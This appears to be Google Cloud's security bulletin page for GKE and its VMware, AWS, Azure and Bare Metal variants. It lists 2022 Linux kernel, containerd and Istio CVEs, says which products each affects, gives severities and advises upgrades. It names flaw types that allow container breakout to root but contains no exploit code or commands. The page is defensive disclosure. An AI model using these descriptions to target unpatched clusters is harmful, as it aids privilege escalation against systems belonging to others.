A new vulnerability (CVE-2022-2602) has been discovered in the io_uring subsystem in the Linux kernel that can allow an attacker to potentially execute arbitrary code. Versions 1.11, 1.12 and 1.13 of GKE on VMware are affected. What should I do?Upgrade your cluster to a patched version. The following versions of GKE on VMware contain code that fixes this vulnerability:
What vulnerabilities are addressed by this patch?With CVE-2022-2602, a race condition between io_uring request processing and Unix socket garbage collection can cause a use-after-free vulnerability. A local attacker could use this to trigger a denial of service or possibly execute arbitrary code. |
High |
GKE on AWS
Description | Severity |
---|---|
A new vulnerability (CVE-2022-2602) has been discovered in the io_uring subsystem in the Linux kernel that can allow an attacker to potentially execute arbitrary code. What should I do?The following current and previous generation versions of GKE on AWS have been updated with code to fix this vulnerability. We recommend that you upgrade your nodes to one of the following GKE on AWS versions:
What vulnerabilities are addressed by this patch?With CVE-2022-2602, a race condition between io_uring request processing and Unix socket garbage collection can cause a use-after-free vulnerability. A local attacker could use this to trigger a denial of service or possibly execute arbitrary code. |
High |
GKE on Azure
Description | Severity |
---|---|
A new vulnerability (CVE-2022-2602) has been discovered in the io_uring subsystem in the Linux kernel that can allow an attacker to potentially execute arbitrary code. What should I do?The following versions of GKE on Azure have been updated with code to fix this vulnerability. We recommend that you upgrade your nodes to one of the following GKE on Azure versions:
What vulnerabilities are addressed by this patch?With CVE-2022-2602, a race condition between io_uring request processing and Unix socket garbage collection can cause a use-after-free vulnerability. A local attacker could use this to trigger a denial of service or possibly execute arbitrary code. |
High |
GKE on Bare Metal
Description | Severity |
---|---|
A new vulnerability (CVE-2022-2602) has been discovered in the io_uring subsystem in the Linux kernel that can allow an attacker to potentially execute arbitrary code. GKE on Bare Metal is not affected by this CVE as it does not bundle an operating system in its distribution. What should I do?No action required. |
None |
GCP-2022-024
Published: 2022-11-09
Updated: 2023-01-19
Reference: CVE-2022-2585, CVE-2022-2588
2023-01-19 Update: GKE version 1.21.14-gke.14100 is available. 2022-12-16 Update: Added revised patch versions for GKE and GKE on VMware.
GKE
Updated: 2023-01-19
Description | Severity |
---|---|
Two new vulnerabilities (CVE-2022-2585 and CVE-2022-2588) have been discovered in the Linux kernel that can lead to a full container break out to root on the node. GKE clusters, including Autopilot clusters, are impacted. GKE clusters using GKE Sandbox are not affected. What should I do?2023-01-19 Update: Version 1.21.14-gke.14100 is available. Upgrade your node pools to this version or later. 2022-12-16 Update: A previous version of the bulletin has been revised due to a release regression. Please manually upgrade your node pools to one of the following GKE versions:
The following versions of GKE have been updated with code to fix this vulnerability. For security purposes, even if you have node-autoupgrade enabled, we recommend that you manually upgrade your node pools to one of the following GKE versions:
Updates for GKE v1.22, 1.23 and 1.25 will be made available soon. This security bulletin will be updated when they become available. A recent feature of release channels allows you to apply a patch without having to unsubscribe from a channel. This lets you secure your nodes until the new version becomes the default for your release specific channel. What vulnerabilities are addressed by this patch?
|
High |
GKE on VMware
Updated: 2022-12-16
Description | Severity |
---|---|
Two new vulnerabilities (CVE-2022-2585 and CVE-2022-2588) have been discovered in the Linux kernel that can lead to a full container break out to root on the node. Versions 1.13, 1.12 and 1.11 of GKE on VMware are affected. What should I do?2022-12-16 Update: The following versions of GKE on VMware have been updated with code to fix this vulnerability. We recommend that you upgrade your admin and user clusters to one of the following GKE on VMware versions:
What vulnerabilities are addressed by this patch?
|
High |
GKE on AWS
Description | Severity |
---|---|
Two new vulnerabilities (CVE-2022-2585 and CVE-2022-2588) have been discovered in the Linux kernel that can lead to a full container break out to root on the node. The following versions of Kubernetes on AWS may be affected:
Kubernetes V1.24 is not affected. What should I do?We recommend that you upgrade your clusters to one of the following AWS Kubernetes versions:
What vulnerabilities are being addressed?With CVE-2022-2585, improper cleanup of timers in the posix cpu timer allows a use-after-free exploit depending on how timers are created and deleted. With CVE-2022-2588, a use-after-free flaw was found in route4_change in the Linux kernel. This flaw allows a local user to crash the system and possibly lead to a local privilege escalation. |
High |
GKE on Azure
Description | Severity |
---|---|
Two new vulnerabilities (CVE-2022-2585 and CVE-2022-2588) have been discovered in the Linux kernel that can lead to a full container break out to root on the node. The following versions of Kubernetes on Azure may be affected:
Kubernetes V1.24 is not affected. What should I do?We recommend that you upgrade your clusters to one of the following Azure Kubernetes versions:
What vulnerabilities are being addressed?With CVE-2022-2585, improper cleanup of timers in the posix cpu timer allows a use-after-free exploit depending on how timers are created and deleted. With CVE-2022-2588, a use-after-free flaw was found in route4_change in the Linux kernel. This flaw allows a local user to crash the system and possibly lead to a local privilege escalation. |
High |
GKE on Bare Metal
Description | Severity |
---|---|
Two new vulnerabilities (CVE-2022-2585 and CVE-2022-2588) have been discovered in the Linux kernel that can lead to a full container break out to root on the node. GKE on Bare Metal is not affected by this CVE as it does not bundle an operating system in its distribution. What should I do?No action required. |
None |
GCP-2022-023
Published: 2022-11-04
Reference: CVE-2022-39278
GKE
Description | Severity |
---|---|
A security vulnerability, CVE-2022-39278, has been discovered in Istio, which is used in Cloud Service Mesh, that allows a malicious attacker to crash the control plane. What should I do?Google Kubernetes Engine (GKE) doesn't ship with Istio and isn't affected by this vulnerability. However, if you have separately installed Cloud Service Mesh or Istio on your GKE cluster, refer to GCP-2022-020, the Cloud Service Mesh security bulletin on this CVE, for more information. |
None |
GKE on VMware
Description | Severity |
---|---|
A security vulnerability, CVE-2022-39278, has been discovered in Istio, which is used in Cloud Service Mesh in GKE on VMware, that allows a malicious attacker to crash the Istio control plane. What should I do?The following versions of GKE on VMware have been updated with code to fix this vulnerability. We recommend that you upgrade your admin and user clusters to one of the following GKE on VMware versions:
What vulnerabilities are addressed by this patch?
With vulnerability CVE-2022-39278, the Istio control plane, |
High |
GKE on AWS
Description | Severity |
---|---|
A security vulnerability, CVE-2022-39278, has been discovered in Istio, which is used in Cloud Service Mesh, that allows a malicious attacker to crash the control plane. What should I do?GKE on AWS isn't affected by this vulnerability and no action is required. |
None |
GKE on Azure
Description | Severity |
---|---|
A security vulnerability, CVE-2022-39278, has been discovered in Istio, which is used in Cloud Service Mesh, that allows a malicious attacker to crash the control plane. What should I do?GKE on Azure isn't affected by this vulnerability and no action is required. |
None |
GKE on Bare Metal
Description | Severity |
---|---|
A security vulnerability, CVE-2022-39278, has been discovered in Istio, which is used in Cloud Service Mesh in GKE on Bare Metal, that allows a malicious attacker to crash the Istio control plane. What should I do?The following versions of GKE on Bare Metal have been updated with code to fix this vulnerability. We recommend that you upgrade clusters to one of the following GKE on Bare Metal versions:
What vulnerabilities are addressed by this patch?
With vulnerability CVE-2022-39278, the Istio control plane, |
High |
GCP-2022-022-updated
Published: 2022-12-08
Reference: CVE-2022-20409
GKE
Updated: 2022-12-14
Description | Severity |
---|---|
A new vulnerability, CVE-2022-20409, has been discovered in the Linux kernel that can lead to local privilege escalation. Google Kubernetes Engine (GKE) v1.22, v1.23, and v1.24 clusters, including Autopilot clusters, using Container-Optimized OS version 93 and 97 are impacted. Other supported GKE versions aren't affected. GKE clusters using GKE Sandbox are unaffected. What should I do?2022-12-14 Update: A previous version of the bulletin has been revised due to a release regression. Please manually upgrade your node pools to one of the following GKE versions:
The following versions of GKE using Container-Optimized OS version 93 and 97 have been updated with code to fix this vulnerability in an upcoming release. For security purposes, even if you have node auto-upgrades enabled, we recommend that you manually upgrade your node pools to one of the following GKE versions:
A recent feature of release channels lets you apply a patch without having to unsubscribe from a channel. This feature lets you secure your nodes until the new version becomes the default for your release-specific channel. What vulnerabilities are addressed by this patch?With CVE-2022-20409, the Linux Kernel has a vulnerability in io_identity_cow of the io_uring subsystem. There's a potential for memory corruption due to a Use-After-Free (UAF) vulnerability. A local attacker could use this memory corruption for denial of service (system crash) or possibly to execute arbitrary code. |
High |
GKE on VMware
Updated: 2022-12-14
Description | Severity |
---|---|
A new vulnerability, CVE-2022-20409, has been discovered in the Linux kernel that can lead to local privilege escalation. What should I do?2022-12-14 Update: The following versions of GKE on VMware for Ubuntu have been updated with code to fix this vulnerability. We recommend that you upgrade your nodes to one of the following GKE on VMware versions:
What vulnerabilities are addressed by this patch?With CVE-2022-20409, the Linux Kernel has a vulnerability in io_identity_cow of the io_uring subsystem. There's a potential for memory corruption due to a Use-After-Free (UAF) vulnerability. A local attacker could use this memory corruption for denial of service (system crash) or possibly to execute arbitrary code. |
High |
GKE on AWS
Description | Severity |
---|---|
A new vulnerability, CVE-2022-20409, has been discovered in the Linux kernel that could allow an unprivileged user to escalate to system execution privilege. What should I do?There's no action required. GKE on AWS doesn't use the affected versions of the Linux kernel. What vulnerabilities are addressed by this patch?With CVE-2022-20409, the Linux Kernel has a vulnerability in io_identity_cow of the io_uring subsystem. There's a potential for memory corruption due to a Use-After-Free (UAF) vulnerability. A local attacker could use this memory corruption for denial of service (system crash) or possibly to execute arbitrary code. |
None |
GKE on Azure
Description | Severity |
---|---|
A new vulnerability, CVE-2022-20409, has been discovered in the Linux kernel that could allow an unprivileged user to escalate to system execution privilege. What should I do?There's no action required. GKE on Azure doesn't use the affected versions of the Linux kernel. What vulnerabilities are addressed by this patch?With CVE-2022-20409, the Linux Kernel has a vulnerability in io_identity_cow of the io_uring subsystem. There's a potential for memory corruption due to a Use-After-Free (UAF) vulnerability. A local attacker could use this memory corruption for denial of service (system crash) or possibly to execute arbitrary code. |
None |
GKE on Bare Metal
Description | Severity |
---|---|
A new vulnerability, CVE-2022-20409, has been discovered in the Linux kernel that can lead to local privilege escalation. What should I do?
|
None |
GCP-2022-021
Published: 2022-10-27
Updated: 2023-01-19, 2023-12-21
Reference: CVE-2022-3176
2023-12-21 Update: Clarify that GKE Autopilot clusters in the default configuration are not impacted.
2023-01-19 Update: GKE version 1.21.14-gke.14100 is available. 2022-12-15 Update: Updated information that version 1.21.14-gke.9400 of Google Kubernetes Engine is pending rollout and may be superseded by a higher version number. 2022-11-21 Update: Added patch versions for GKE on VMware, GKE on AWS, and GKE on Azure.
GKE
Updated: 2023-01-19, 2023-12-21
Description | Severity |
---|---|
A new vulnerability, CVE-2022-3176, has been discovered in the Linux kernel that can lead to local privilege escalation. This vulnerability allows an unprivileged user to achieve full container breakout to root on the node. 2023-12-21 Update: The original bulletin stated Autopilot
clusters are impacted, but this was incorrect. GKE Autopilot
clusters in the default configuration are not impacted, but might be vulnerable if you
explicitly set the seccomp Unconfined profile or
allow Google Kubernetes Engine (GKE) v1.21 clusters, including Autopilot clusters, using Container-Optimized OS version 89 are impacted. Later versions of GKE aren't affected. All Linux clusters with Ubuntu are affected. GKE clusters using GKE Sandbox are unaffected. What should I do?2023-01-19 Update: Version 1.21.14-gke.14100 is available. Upgrade your node pools to this version or later. 2022-12-15 Update: Version 1.21.14-gke.9400 is pending rollout and may be superseded by a higher version number. We will update this doc when said new version is available. The following versions of GKE have been updated with code to fix this vulnerability in an upcoming release. For security purposes, even if you have node auto-upgrades enabled, we recommend that you manually upgrade your node pools to one of the following GKE versions:
A recent feature of release channels lets you apply a patch without having to unsubscribe from a channel. This feature lets you secure your nodes until the new version becomes the default for your release-specific channel. What vulnerabilities are addressed by this patch?With CVE-2022-3176, the Linux Kernel has a vulnerability in the io_uring subsystem. Missing POLLFREE handling can lead to Use-After-Free (UAF) exploits that can be used for privilege escalation. |
High |
GKE on VMware
Updated: 2022-11-21
Description | Severity |
---|---|
A new vulnerability, CVE-2022-3176, has been discovered in the Linux kernel that can lead to local privilege escalation. This vulnerability allows an unprivileged user to achieve full container breakout to root on the node. What should I do?
2022-11-21 Update: The following versions of GKE on VMware for Ubuntu have been updated with code to fix this vulnerability. We recommend that you upgrade your nodes to one of the following GKE on VMware versions:
Versions of GKE on VMware that contain Ubuntu patches will be released soon. This security bulletin will be updated when the GKE on VMware versions are available for download. What vulnerabilities are addressed by this patch?With CVE-2022-3176, the Linux Kernel has a vulnerability in the io_uring subsystem. Missing POLLFREE handling can lead to Use-After-Free (UAF) exploits that can be used for privilege escalation. |
High |
GKE on AWS
Updated: 2022-11-21
Description | Severity |
---|---|
A new vulnerability, CVE-2022-3176, has been discovered in the Linux kernel that can lead to local privilege escalation. This vulnerability allows an unprivileged user to achieve full container breakout to root on the node. What should I do?2022-11-21 Update: The following current and previous generation versions of GKE on AWS have been updated with code to fix this vulnerability. We recommend that you upgrade your nodes to one of the following GKE on AWS versions: Current generation
Versions of GKE on AWS that contain Ubuntu patches will be released soon. This security bulletin will be updated when the GKE on AWS versions are available for download. What vulnerabilities are addressed by this patch?With CVE-2022-3176, the Linux Kernel has a vulnerability in the io_uring subsystem. Missing POLLFREE handling can lead to Use-After-Free (UAF) exploits that can be used for privilege escalation. |
High |
GKE on Azure
Updated: 2022-11-21
Description | Severity |
---|---|
A new vulnerability, CVE-2022-3176, has been discovered in the Linux kernel that can lead to local privilege escalation. This vulnerability allows an unprivileged user to achieve full container breakout to root on the node. What should I do?2022-11-21 Update: The following versions of GKE on Azure have been updated with code to fix this vulnerability. We recommend that you upgrade your nodes to one of the following GKE on Azure versions:
Versions of GKE on Azure that contain Ubuntu patches will be released soon. This security bulletin will be updated when the GKE on Azure versions are available for download. What vulnerabilities are addressed by this patch?With CVE-2022-3176, the Linux Kernel has a vulnerability in the io_uring subsystem. Missing POLLFREE handling can lead to Use-After-Free (UAF) exploits that can be used for privilege escalation. |
High |
GKE on Bare Metal
Description | Severity |
---|---|
A new vulnerability, CVE-2022-3176, has been discovered in the Linux kernel that can lead to local privilege escalation. This vulnerability allows an unprivileged user to achieve full container breakout to root on the node. What should I do?No action required. GKE on Bare Metal isn't affected by this CVE as it doesn't bundle an operating system in its distribution. |
None |
GCP-2022-018
Published: 2022-08-01
Updated: 2022-09-14, 2023-12-21
Reference: CVE-2022-2327
2023-12-21 Update: Clarify that GKE Autopilot clusters in the default configuration are not impacted.
2022-09-14 Update: Added patch versions for GKE on VMware, GKE on AWS, and GKE on Azure.
GKE
Updated: 2023-12-21
Description | Severity |
---|---|
A new vulnerability (CVE-2022-2327) has been discovered in the Linux kernel that can lead to local privilege escalation. This vulnerability allows an unprivileged user to achieve a full container breakout to root on the node. Technical details2023-12-21 Update: The original bulletin stated Autopilot
clusters are impacted, but this was incorrect. GKE Autopilot
clusters in the default configuration are not impacted, but might be vulnerable if you
explicitly set the seccomp Unconfined profile or
allow GKE clusters, including Autopilot clusters, with Container-Optimized OS (COS) using Linux Kernel version 5.10 are affected. GKE clusters using Ubuntu images or using GKE Sandbox are unaffected. What should I do?Upgrade your GKE clusters to a version that includes the fix.
The Linux node images for COS have been updated along with GKE
versions using those COS versions.
A recent feature of release channels allows you to apply a patch without having to unsubscribe from a channel. This lets you upgrade your nodes to the patched version before that version becomes the default in your selected release channel. What vulnerabilities are addressed by this patch?With CVE-2022-2327, the Linux kernel in version 5.10 has a vulnerability in the io_uring subsystem where various requests are missing item types (flags). Using these requests without the proper item types specified can cause privilege escalation to root. |
High |
GKE on VMware
Updated: 2022-09-14
Description | Severity |
---|---|
A new vulnerability (CVE-2022-2327) has been discovered in the Linux kernel that can lead to local privilege escalation. This vulnerability allows an unprivileged user to achieve a full container breakout to root on the node. Clusters with a Container Optimized OS (COS) image using GKE on VMware versions 1.10, 1.11, and 1.12 are affected. What should I do?2022-09-14 Update: The following versions of GKE on VMware contain code that fixes this vulnerability.
Versions of GKE on VMware that contain patches will be released soon. This security bulletin will be updated when the GKE on VMware versions are available for download. What vulnerabilities are addressed by this patch?With CVE-2022-2327, the Linux kernel in version 5.10 has a vulnerability in the io_uring subsystem where various requests are missing item types (flags). Using these requests without the proper item types specified can cause privilege escalation to root. |
High |
GKE on AWS
Updated: 2022-09-14
Description | Severity |
---|---|
A new vulnerability (CVE-2022-2327) has been discovered in the Linux kernel that can lead to local privilege escalation. This vulnerability allows an unprivileged user to achieve a full container breakout to root on the node. What should I do?2022-09-14 Update: The following current and previous generation versions of GKE on AWS have been updated with code to fix this vulnerability. We recommend that you upgrade your nodes to one of the following GKE on AWS versions: Current generation
Previous generation
Versions of GKE on AWS that contain patches will be released soon. This security bulletin will be updated when the GKE on AWS versions are available for download. What vulnerabilities are addressed by this patch?With CVE-2022-2327, the Linux kernel in version 5.10 has a vulnerability in the io_uring subsystem where various requests are missing item types (flags). Using these requests without the proper item types specified can cause privilege escalation to root. |
High |
GKE on Azure
Updated: 2022-09-14
Description | Severity |
---|---|
A new vulnerability (CVE-2022-2327) has been discovered in the Linux kernel that can lead to local privilege escalation. This vulnerability allows an unprivileged user to achieve a full container breakout to root on the node. What should I do?2022-09-14 Update: The following versions of GKE on Azure have been updated with code to fix this vulnerability. We recommend that you upgrade your nodes to one of the following GKE on Azure versions:
Versions of GKE on Azure that contain patches will be released soon. This security bulletin will be updated when the GKE on Azure versions are available for download. What vulnerabilities are addressed by this patch?With CVE-2022-2327, the Linux kernel in version 5.10 has a vulnerability in the io_uring subsystem where various requests are missing item types (flags). Using these requests without the proper item types specified can cause privilege escalation to root. |
High |
Google Distributed Cloud Virtual for Bare Metal
Description | Severity |
---|---|
A new vulnerability (CVE-2022-2327) has been discovered in the Linux kernel that can lead to local privilege escalation. This vulnerability allows an unprivileged user to achieve a full container breakout to root on the node. What should I do?There is no action required. Google Distributed Cloud Virtual for Bare Metal is not affected by this CVE as it does not bundle an operating system in its distribution. |
None |
GCP-2022-017
Published: 2022-06-29
Updated: 2022-11-22
Reference: CVE-2022-1786
2022-11-22 Update: Updated information about workloads using GKE Sandbox.
2022-07-21 Update: Updated information that GKE on VMware COS images
are affected.
GKE
Updated: 2022-11-22
Description | Severity |
---|---|
2022-11-22 update: Workloads using GKE Sandbox are not affected by these vulnerabilities. A new vulnerability (CVE-2022-1786) has been discovered in the Linux kernel versions 5.10 and 5.11. This vulnerability allows an unprivileged user with local access to the cluster to achieve a full container breakout to root on the node. Only clusters that run Container-Optimized OS are affected. GKE Ubuntu versions use either version 5.4 or 5.15 of the kernel and are not affected. What should I do?The versions of Linux node images for Container-Optimized OS for the following versions of GKE have been updated with code to fix this vulnerability. For security purposes, even if you have node-autoupgrade enabled, we recommend that you manually upgrade your node pools to one of the following upcoming GKE versions:
A recent release channels feature allows you to apply a patch without having to unsubscribe from a channel. This lets you upgrade your nodes to the patched version before that version becomes the default in your selected release channel. What vulnerabilities are addressed by this patch?With CVE-2022-1786, a use-after-free flaw was found in the Linux kernel's io_uring subsystem. If a user sets up a ring with IORING_SETUP_IOPOLL with more than one task completing submissions on the ring, a local user can crash or escalate their privileges on the system. |
High |
GKE on VMware
Updated: 2022-07-14
Description | Severity |
---|---|
A new vulnerability (CVE-2022-1786) has been discovered in the Linux kernel versions 5.10 and 5.11. This vulnerability allows an unprivileged user with local access to the cluster to achieve a full container breakout to root on the node. What should I do?2022-07-21 Update: The following versions of GKE on VMware contain code that fixes this vulnerability. COS
UbuntuThere is no action required. GKE on VMware does not use the affected versions of the Linux kernel. |
None |
GKE on AWS
Description | Severity |
---|---|
A new vulnerability (CVE-2022-1786) has been discovered in the Linux kernel versions 5.10 and 5.11. This vulnerability allows an unprivileged user with local access to the cluster to achieve a full container breakout to root on the node. What should I do?There is no action required. GKE on AWS does not use the affected versions of the Linux kernel. |
None |
GKE on Azure
Description | Severity |
---|---|
A new vulnerability (CVE-2022-1786) has been discovered in the Linux kernel versions 5.10 and 5.11. This vulnerability allows an unprivileged user with local access to the cluster to achieve a full container breakout to root on the node. What should I do?There is no action required. GKE on Azure does not use the affected versions of the Linux kernel. |
None |
Google Distributed Cloud Virtual for Bare Metal
Description | Severity |
---|---|
A new vulnerability (CVE-2022-1786) has been discovered in the Linux kernel versions 5.10 and 5.11. This vulnerability allows an unprivileged user with local access to the cluster to achieve a full container breakout to root on the node. What should I do?There is no action required. Google Distributed Cloud Virtual for Bare Metal is not affected by this CVE as it does not bundle an operating system in its distribution. |
None |
GCP-2022-016
Published: 2022-06-23
Updated: 2022-11-22
Reference: CVE-2022-29581, CVE-2022-29582, CVE-2022-1116
2022-11-22 Update: Added information about workloads running in Autopilot clusters.
2022-07-29 Update: Updated versions for GKE on VMware,
GKE on AWS, and GKE on Azure.
GKE
Updated: 2022-11-22
Description | Severity |
---|---|
2022-11-22 update: Autopilot clusters are not affected by CVE-2022-29581 but are vulnerable to CVE-2022-29582 and CVE-2022-1116. 2022-07-29 update: Pods using GKE Sandbox are not vulnerable to these vulnerabilities. Three new memory corruption vulnerabilities (CVE-2022-29581, CVE-2022-29582, CVE-2022-1116) have been discovered in the Linux kernel. These vulnerabilities allow an unprivileged user with local access to the cluster to achieve a full container breakout to root on the node. All Linux clusters (Container-Optimized OS and Ubuntu) are affected. What should I do?The versions of Linux node images for both Container-Optimized OS and Ubuntu for the following versions of GKE have been updated with code to fix this vulnerability. For security purposes, even if you have node auto-upgrade enabled, we recommend that you manually upgrade your node pools to one of the following GKE versions:
A recent feature of release channels allows you to apply a patch without having to unsubscribe from a channel. This lets you upgrade your nodes to the patched version before that version becomes the default in your selected release channel. What vulnerabilities are addressed by this patch?With CVE-2022-29582, the Linux kernel in versions prior to 5.17.3 has a use-after-free due to a race condition in io_uring timeouts. CVE-2022-29581 and CVE-2022-1116 are vulnerabilities where a local attacker can cause memory corruption in io_uring or net/sched in the Linux kernel to escalate privileges to root. |
High |
GKE on VMware
Updated: 2022-07-29
Description | Severity |
---|---|
2022-07-29 Update: The following versions of GKE on VMware contain code that fixes these vulnerabilities.
Three new memory corruption vulnerabilities (CVE-2022-29581, CVE-2022-29582, CVE-2022-1116) have been discovered in the Linux kernel. These vulnerabilities allow an unprivileged user with local access to the cluster to achieve a full container breakout to root on the node. These vulnerabilities affect GKE on VMware v1.9 and later for Container-Optimized OS and Ubuntu images. What should I do?Versions of GKE on VMware that contain patches will be released soon. This security bulletin will be updated when the GKE on VMware versions are available for download. What vulnerabilities are addressed by this patch?With CVE-2022-29582, the Linux kernel in versions prior to 5.17.3 has a use-after-free due to a race condition in io_uring timeouts. CVE-2022-29581 and CVE-2022-1116 are vulnerabilities where a local attacker can cause memory corruption in io_uring or net/sched in the Linux kernel to escalate privileges to root. |
High |
GKE on AWS
Updated: 2022-07-29
Description | Severity |
---|---|
2022-07-29 Update: Update: The following current and previous generation versions of GKE on AWS have been updated with code to fix these vulnerabilities. We recommend that you upgrade your nodes to one of the following GKE on AWS versions: Current generation:
Three new memory corruption vulnerabilities (CVE-2022-29581, CVE-2022-29582, CVE-2022-1116) have been discovered in the Linux kernel. These vulnerabilities allow an unprivileged user with local access to the cluster to achieve a full container breakout to root on the node. These vulnerabilities affect all versions of GKE on AWS. What should I do?Versions of GKE on AWS that contain patches will be released soon. This security bulletin will be updated when the GKE on AWS versions are available for download. What vulnerabilities are addressed by this patch?With CVE-2022-29582, the Linux kernel in versions prior to 5.17.3 has a use-after-free due to a race condition in io_uring timeouts. CVE-2022-29581 and CVE-2022-1116 are vulnerabilities where a local attacker can cause memory corruption in io_uring or net/sched in the Linux kernel to escalate privileges to root. |
High |
GKE on Azure
Description | Severity |
---|---|
2022-07-29 Update: Update: The following versions of GKE on Azure have been updated with code to fix these vulnerabilities. We recommend that you upgrade your nodes to one of the following GKE on Azure versions:
Three new memory corruption vulnerabilities (CVE-2022-29581, CVE-2022-29582, CVE-2022-1116) have been discovered in the Linux kernel. These vulnerabilities allow an unprivileged user with local access to the cluster to achieve a full container breakout to root on the node. These vulnerabilities affect all versions of GKE on Azure. What should I do?Versions of GKE on Azure that contain patches will be released soon. This security bulletin will be updated when the GKE on Azure versions are available for download. What vulnerabilities are addressed by this patch?With CVE-2022-29582, the Linux kernel in versions prior to 5.17.3 has a use-after-free due to a race condition in io_uring timeouts. CVE-2022-29581 and CVE-2022-1116 are vulnerabilities where a local attacker can cause memory corruption in io_uring or net/sched in the Linux kernel to escalate privileges to root. |
High |
Google Distributed Cloud Virtual for Bare Metal
Description | Severity |
---|---|
Three new memory corruption vulnerabilities (CVE-2022-29581, CVE-2022-29582, CVE-2022-1116) have been discovered in the Linux kernel. These vulnerabilities allow an unprivileged user with local access to the cluster to achieve a full container breakout to root on the node. What should I do?There is no action required. Google Distributed Cloud Virtual for Bare Metal is not affected by this vulnerability as it does not bundle an operating system in its distribution. |
None |
GCP-2022-014
Published: 2022-04-26
Updated: 2022-11-22
2022-11-22 Update: Added information about workloads running in Autopilot clusters.
2022-05-12 Update: Updated patch versions for GKE on AWS and
GKE on Azure.
Reference: CVE-2022-1055, CVE-2022-27666
GKE
Updated: 2022-11-22
Description | Severity |
---|---|
2022-11-22 update: GKE Autopilot clusters and workloads running in GKE Sandbox are unaffected by these vulnerabilities. Two security vulnerabilities, CVE-2022-1055 and CVE-2022-27666 have been discovered in the Linux kernel. Each can lead to a local attacker being able to perform a container breakout, privilege escalation on the host, or both. These vulnerabilities affect all GKE node operating systems (Container-Optimized OS and Ubuntu). Technical detailsIn CVE-2022-1055, an attacker can exploit use-after-free in tc_new_tfilter() which allows a local attacker in the container to escalate privileges to root on node. In CVE-2022-27666, buffer overflow in esp/esp6_output_head allows a local attacker in the container to escalate privileges to root on the node. What should I do?The versions of Linux node images for the following versions of GKE have been updated with code to fix these vulnerabilities. Upgrade your clusters to one of the following upcoming GKE versions:
What vulnerabilities are addressed by this patch? |
High |
GKE on VMware
Description | Severity |
---|---|
Two security vulnerabilities, CVE-2022-1055 and CVE-2022-27666 have been discovered in the Linux kernel. Each can lead to a local attacker being able to perform a container breakout, privilege escalation on the host, or both. These vulnerabilities affect all GKE node operating systems (Container-Optimized OS and Ubuntu). Technical detailsIn CVE-2022-1055, an attacker can exploit use-after-free in tc_new_tfilter() which allows a local attacker in the container to escalate privileges to root on node. In CVE-2022-27666, buffer overflow in esp/esp6_output_head allows a local attacker in the container to escalate privileges to root on the node. What should I do?Upgrade your cluster to a patched version. The following GKE on VMware versions or newer contain the fix for this vulnerability:
What vulnerabilities are addressed by this patch? |
High |
GKE on AWS
Updated: 2022-05-12
Description | Severity |
---|---|
Two security vulnerabilities, CVE-2022-1055 and CVE-2022-27666 have been discovered in the Linux kernel. Each can lead to a local attacker being able to perform a container breakout, privilege escalation on the host, or both. These vulnerabilities affect all GKE node operating systems (Container-Optimized OS and Ubuntu). Technical detailsIn CVE-2022-1055, an attacker can exploit use-after-free in tc_new_tfilter() which allows a local attacker in the container to escalate privileges to root on node. In CVE-2022-27666, buffer overflow in esp/esp6_output_head allows a local attacker in the container to escalate privileges to root on the node. What should I do?2022-05-12 Update: The following current and previous generation versions of GKE on AWS have been updated with code to fix these vulnerabilities. We recommend that you upgrade your nodes to one of the following GKE on AWS versions: Current generation
Upgrade your cluster to a patched version. Patches will be available in an upcoming release. This bulletin will be updated when they are available. What vulnerabilities are addressed by this patch? |
High |
GKE on Azure
Updated: 2022-05-12
Description | Severity |
---|---|
Two security vulnerabilities, CVE-2022-1055 and CVE-2022-27666 have been discovered in the Linux kernel. Each can lead to a local attacker being able to perform a container breakout, privilege escalation on the host, or both. These vulnerabilities affect all GKE node operating systems (Container-Optimized OS and Ubuntu). Technical detailsIn CVE-2022-1055, an attacker can exploit use-after-free in tc_new_tfilter() which allows a local attacker in the container to escalate privileges to root on node. In CVE-2022-27666, buffer overflow in esp/esp6_output_head allows a local attacker in the container to escalate privileges to root on the node. What should I do?2022-05-12 Update: The following versions of GKE on Azure have been updated with code to fix these vulnerabilities. We recommend that you upgrade your nodes to one of the following GKE on Azure versions:
Upgrade your cluster to a patched version. Patches will be available in an upcoming release. This bulletin will be updated when they are available. What vulnerabilities are addressed by this patch? |
High |
Google Distributed Cloud Virtual for Bare Metal
Description | Severity |
---|---|
Two security vulnerabilities, CVE-2022-1055 and CVE-2022-27666 have been discovered in the Linux kernel. Each can lead to a local attacker being able to perform a container breakout, privilege escalation on the host, or both. These vulnerabilities affect all GKE node operating systems (Container-Optimized OS and Ubuntu). Technical detailsIn CVE-2022-1055, an attacker can exploit use-after-free in tc_new_tfilter() which allows a local attacker in the container to escalate privileges to root on node. In CVE-2022-27666, buffer overflow in esp/esp6_output_head allows a local attacker in the container to escalate privileges to root on the node. What should I do?There is no action required. Google Distributed Cloud Virtual for Bare Metal is not affected by this CVE as it does not include Linux as part of its package. You should ensure that the node images you use are updated to versions that contain the fix for CVE-2022-1055 and CVE-2022-27666. What vulnerabilities are addressed by this patch? |
High |
GCP-2022-013
Published: 2022-04-11
Updated: 2022-04-20
Reference: CVE-2022-23648
2022-04-22 Update: Updated patch versions for Google Distributed Cloud Virtual for Bare Metal and GKE on VMware.
GKE
Description | Severity |
---|---|
A security vulnerability, CVE-2022-23648, has been discovered in containerd's handling of path traversal in the OCI image volume specification. Containers launched through containerd's CRI implementation with a specially-crafted image configuration could gain full read access to arbitrary files and directories on the host. This vulnerability may bypass any policy-based enforcement on container setup (including a Kubernetes Pod Security Policy). This vulnerability affects all GKE node operating systems (Container-Optimized OS and Ubuntu) which use containerd by default. All GKE, Autopilot, and GKE Sandbox nodes are affected. What should I do?The versions of Linux node images for the following versions of GKE have been updated with code to fix this vulnerability. For security purposes, even if you have node-autoupgrade enabled, we recommend that you manually upgrade your nodes to one of the following GKE versions:
A recent feature of release channels allows you to apply a patch without having to unsubscribe from a channel. This lets you secure your nodes until the new version becomes the default for your specific release channel. |
Medium |
GKE on VMware
Updated: 2022-04-22
Description | Severity |
---|---|
A security vulnerability, CVE-2022-23648, has been discovered in containerd's handling of path traversal in the OCI image volume specification. Containers launched through containerd's CRI implementation with a specially-crafted image configuration could gain full read access to arbitrary files and directories on the host. This vulnerability may bypass any policy-based enforcement on container setup (including a Kubernetes Pod Security Policy). This vulnerability affects all GKE on VMware with stackdriver enabled, which uses containerd. GKE on VMware versions 1.8, 1.9, and 1.10 are affected What should I do?2022-04-22 Update: The following versions of GKE on VMware contain code that fixes this vulnerability.
The following versions of GKE on VMware have been updated with code to fix this vulnerability. We recommend that you upgrade your nodes to one of the following GKE on VMware versions:
This CVE can be mitigated by setting IgnoreImageDefinedVolumes to true. |
Medium |
GKE on AWS
Description | Severity |
---|---|
